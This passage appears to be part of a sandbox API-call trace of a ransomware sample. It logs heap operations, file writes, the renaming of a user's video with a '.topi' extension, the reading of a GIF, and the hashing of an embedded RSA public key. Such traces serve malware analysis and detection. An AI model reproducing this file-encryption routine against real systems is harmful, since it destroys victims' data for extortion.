(HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.367] GetCurrentThreadId () returned 0x8c4 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0094.367] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.367] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fd0 [0094.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0094.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fe8 [0094.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fb8 [0094.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0094.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0094.368] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.368] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9000 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d89a0 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fd0 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fd0 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fd0 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x3165e90 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0094.389] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0094.389] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9000 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fe8 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fb8 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8f40 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d37c0 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9c28 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x320fab0 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.390] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0094.390] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f52d8*, nNumberOfBytesToWrite=0x6af3, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f52d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x6af3, lpOverlapped=0x0) returned 1 [0094.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f52d8 | out: hHeap=0x680000) returned 1 [0094.391] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x6af8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.391] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0094.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0094.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0094.391] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0094.391] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0094.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.391] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0094.391] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0094.391] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0094.391] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0094.391] CloseHandle (hObject=0x6a8) returned 1 [0094.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0094.392] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0094.392] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0094.393] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bYBn.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bybn.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bYBn.mp4.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bybn.mp4.topi")) returned 1 [0094.393] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0094.393] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.393] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.394] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0094.394] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14c3e630, ftCreationTime.dwHighDateTime=0x1d5bfbb, ftLastAccessTime.dwLowDateTime=0x7153f550, ftLastAccessTime.dwHighDateTime=0x1d5c59e, ftLastWriteTime.dwLowDateTime=0x7153f550, ftLastWriteTime.dwHighDateTime=0x1d5c59e, nFileSizeHigh=0x0, nFileSizeLow=0xf715, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cSYYXp.gif", cAlternateFileName="")) returned 1 [0094.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x31cb568 [0094.394] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x76) returned 0x31cab80 [0094.395] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0094.395] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cSYYXp.gif") returned=".gif" [0094.395] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\cSYYXp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\csyyxp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0094.395] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=63253) returned 1 [0094.395] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0094.397] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xf6ef, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.397] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0094.398] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.398] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.398] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0094.398] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0xf715, lpOverlapped=0x0) returned 1 [0094.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.399] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0094.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.399] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0094.399] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0094.400] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0094.401] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0094.401] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0094.401] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0094.401] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0094.401] GetLastError () returned 0x0 [0094.401] CryptDestroyHash (hHash=0x31c7580) returned 1 [0094.401] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0094.401] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0094.402] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0094.402] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.402] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0094.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xf720) returned 0x99f52d8 [0094.402] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0094.402] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d37c0 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8f40 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x31d3808 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fb8 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8fe8 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9000 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0094.402] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x3165e90 [0094.402] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fe8 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9000 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9000 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8fe8 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0094.403] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9000 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8fe8 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0094.403] HeapFree 